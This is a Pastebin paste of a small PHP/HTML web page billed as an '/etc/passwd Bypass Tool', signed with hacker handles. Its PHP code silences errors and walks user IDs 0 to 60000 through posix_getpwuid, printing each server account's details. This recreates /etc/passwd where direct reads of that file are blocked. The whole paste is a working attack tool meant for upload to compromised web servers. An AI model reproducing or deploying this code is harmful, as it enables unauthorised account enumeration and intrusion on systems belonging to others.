Xyb3r-D3vil

/etc/passwd Bypasser By Xyb3r D3vil & 1337 H@x0r

Apr 5th, 2016
677
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.67 KB | None | 0 0
  1. <title>/etc/Passwd Bypass Tool</title>
  2. <body background="http://i.imgur.com/fNn3EAW.png" bgcolor="black">
  3. <form>
  4. <p align="center" dir="rtl"><font color="#008080">
  5. <center><font color="red" face="Tahoma"><h1>/etc/passwd Bypasser By Xyb3r D3vil & 1337 H@x0r</h1></font></a></font><font color="red">
  6. <font color="red"><span lang="ar-sa">
  7. </form>
  8. <form>
  9. <center><td width="50%"><font color=red>users in server:<font color="black">&#222;&#199;&#198;&#227;&#229; &#199;&#225;&#237;&#230;&#210;&#209;&#199;&#202; &#200;&#199;&#225;&#211;&#237;&#209;&#221;&#209;</font></font></td>
  10. <td width="50%"><select size=\"1\" name="plugin"><option value="plugin">/etc/passwd</option></option></select></td>
  11. <td width="100%" colspan="2">
  12. <p align="center"><input type="submit" value="Submit"></td>
  13. </form>
  14. <textarea method='POST' rows=20 cols=100 wrap=off>
  15.  
  16. <?php
  17. error_reporting(0);
  18. if ($_GET['plugin'] )
  19.  
  20. for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
  21. $ara = posix_getpwuid($uid);
  22. if (!empty($ara)) {
  23. while (list ($key, $val) = each($ara)){
  24. print "$val:";
  25. }
  26. print "\n";
  27. }
  28. }
  29. echo "</textarea>";
  30.  
  31. ?>
  32. <br>
  33. <br><a href="https://facebook.com/XybEr.D3vil">Xyb3r D3vil</a></br>
  34. <br><a href="https://facebook.com/Kool7Minded">1337 H@x0r</a></br>
Add Comment
Please, Sign In to add comment